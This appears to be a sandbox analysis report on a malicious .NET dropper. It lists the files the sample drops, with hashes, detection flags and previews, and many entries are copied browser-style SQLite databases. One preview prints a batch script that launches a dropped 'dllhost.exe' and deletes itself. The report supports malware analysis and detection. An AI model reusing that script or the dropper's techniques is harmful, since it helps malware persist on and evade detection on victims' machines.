C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hxpWOXgnBGVLArPcwqxpuA.exe

Download File

Process:	C:\Users\user\Desktop\4Awb1u1GcJ.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1916928
Entropy (8bit):	7.536430435787372
Encrypted:	false
SSDEEP:	24576:nfNh6iTrBgSq+kdkpupwocpF4jGdWWfWanontd7ksYKtAwqgKchGGqGLk6kIv/D5:f3/kGAwaCYO4ngs7wg8UkcX
MD5:	382EAEDC34BFC15B7E749FB8A0CFF600
SHA1:	D8729997725A187120EE95E1D6068586A13AB678
SHA-256:	E864306092DF6D14C7214C505630F0DF5FAAA0F622331EEC1DC9D3841DE2847A
SHA-512:	F2BE10566728F10A1396ABF3115A01D98A5B06D18B94E84ECB6FBB012F1AD3AD588BE84F09CEAFA55BC9FD65A7E6763C68CA67596141C750AE54A2BEBFC5C16B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 61%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....=g.................8...........V... ...`....@.. ....................................@..................................U..K....`.. ............................................................................ ............... ..H............text...$6... ...8.................. ..`.rsrc... ....`.......:..............@....reloc...............>..............@..B.................V......H...........$..............du..AU.......................................0..........(.... ........8........E....).......M...q...8$...(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8z...*...0..'....... ........8........E........................F.......8........~....(9...~....(=... ....<.... ....~....{x...9....& ....8....~....(1... .... .... ....s....~....(5....... ....~....{....9Y...& ....8N...~....9=... ....8:...8I... ..

C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hxpWOXgnBGVLArPcwqxpuA.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\4Awb1u1GcJ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\4Awb1u1GcJ.exe.log

Download File

Process:	C:\Users\user\Desktop\4Awb1u1GcJ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1396
Entropy (8bit):	5.350961817021757
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
MD5:	EBB3E33FCCEC5303477CB59FA0916A28
SHA1:	BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
SHA-256:	DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
SHA-512:	663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dllhost.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.354334472896228
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
MD5:	9F9FA9EFE67E9BBD165432FA39813EEA
SHA1:	6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
SHA-256:	4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
SHA-512:	F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\hxpWOXgnBGVLArPcwqxpuA.exe.log

Download File

Process:	C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.354334472896228
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
MD5:	9F9FA9EFE67E9BBD165432FA39813EEA
SHA1:	6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
SHA-256:	4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
SHA-512:	F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	1.1510207563435464
Encrypted:	false
SSDEEP:	3:NlllulTkklh:NllUokl
MD5:	8F489B5B8555D6E9737E8EE991AA32FD
SHA1:	05B412B1818DDB95025A6580D9E1F3845F6A2AFC
SHA-256:	679D924F42E8FC107A7BE221DE26CCFEBF98633EA2454D3B4E0D82ED66E3E03D
SHA-512:	97521122A5B64237EF3057A563284AC5C0D3354E8AC5AA0DE2E2FA61BA63379091200D1C4A36FABC16B049E83EF11DBB62E1987A6E4D6A4BCD5DDB27E7BD9F49
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\0pK176txNc

Download File

Process:	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\4QeE6ZCpTU

Download File

Process:	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\6J72VKAvpf

Download File

Process:	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\CoR7Sr8702

Download File

Process:	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\D2vIP4TtBE

Download File

Process:	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\DYNHCSKJxW

Download File

Process:	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	14
Entropy (8bit):	3.378783493486176
Encrypted:	false
SSDEEP:	3:Y2Qt6eYYn:Y2Qt6eYYn
MD5:	6CA4960355E4951C72AA5F6364E459D5
SHA1:	2FD90B4EC32804DFF7A41B6E63C8B0A40B592113
SHA-256:	88301F0B7E96132A2699A8BCE47D120855C7F0A37054540019E3204D6BCBABA3
SHA-512:	8544CD778717788B7484FAF2001F463320A357DB63CB72715C1395EF19D32EEC4278BAB07F15DE3F4FED6AF7E4F96C41908A0C45BE94D5CDD8121877ECCF310D
Malicious:	false
Preview:	{"Surveys":{}}

C:\Users\user\AppData\Local\Temp\Fb5KP0txom

Download File

Process:	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IlR0bOOM5K

Download File

Process:	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Kqg9KuU8rg

Download File

Process:	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\LAM96rPtUY

Download File

Process:	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RDXOCBTIef

Download File

Process:	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.0536606896881855
Encrypted:	false
SSDEEP:	3:axERTrr:aSTH
MD5:	E743036C24F10B9E740A12D4649D4CE8
SHA1:	7B4635FF4E7E622A10D4F77EC9C18D3E21A15839
SHA-256:	DE4794771890223C11EC0897AD8FC37BA69DB56606A218719BADEBA2FD13862B
SHA-512:	7A38599A4B2F41A3C4A050464C7F6CF2AD61D62C95938924DCD3986EEFC2A8CBCDA90D992E00AA640E5A3233DA491ACF6B5C2FB0E60D2BE4B674D6859F7FA0D6
Malicious:	false
Preview:	Ava41leaatvcfZoaIMHJoT6oY

C:\Users\user\AppData\Local\Temp\RESE1D7.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6ec, 10 symbols, created Mon Nov 25 22:57:02 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1956
Entropy (8bit):	4.549164399640855
Encrypted:	false
SSDEEP:	24:HPjO9/OttDfHKwKEsmNyluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+QlUZ:VtxBKhmMluOulajfqXSfbNtmh1Z
MD5:	91AB72B3D71B568F01ECF200C51F5F1C
SHA1:	064A5D6FD41EC75EE8EE3FD94F0D92F8EBCC5ADF
SHA-256:	BB81268AE20D5162C8B80C7C14B70ED6D7B4DD660F69431F7F41D27C1B7A772B
SHA-512:	7454E5A9D97A9BBF29A7409CA7F5AAC659E4FBE1804F61967EA4AC283356A5A43A8AA853641BCA4A6CA12219403D938076147F32DA2CEB04EB3831A3FAB205D5
Malicious:	false
Preview:	L.....Eg.............debug$S........<...................@..B.rsrc$01................h...........@..@.rsrc$02........p...\|...............@..@........=....c:\Windows\System32\CSC3F9C54C7EA774D8CB8E83128B6DCF481.TMP.....................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RESE1D7.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................\|...............................................\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.

C:\Users\user\AppData\Local\Temp\RM8EX6c6Td.bat

Download File

Process:	C:\Users\user\Desktop\4Awb1u1GcJ.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	162
Entropy (8bit):	5.092349552988778
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m1t+QnfHYWtACSBktKcKZG1t+kiE2J5xAIKdeqYHn:hCRLuVFOOr+DE1wQfHYMsKOZG1wkn23d
MD5:	F2FB7CE43631A21C6A4D873DEDE131BB
SHA1:	7BEEEB18FEC5EC4B9337F2911D95669286F06A9F
SHA-256:	ACD326CE7639DE5B532B7F54DF4505C692FADD866FD14137D24333D4A7F15560
SHA-512:	F26864DBC586432FA193A8615936271203D2E5A26D6EF66BD586A46FBA870AB4F168079C6715FD5C4268CF9522E8F87E13AAB67112C7610120D79B7120C82B11
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\NetHood\dllhost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\RM8EX6c6Td.bat"

C:\Users\user\AppData\Local\Temp\SzENTQo0yG

Download File

Process:	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\X54FKLunGc

Download File

Process:	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0udnmgks.co3.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1eg0dm4p.asx.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2pb354xt.11m.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_43yl3ryg.o3j.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
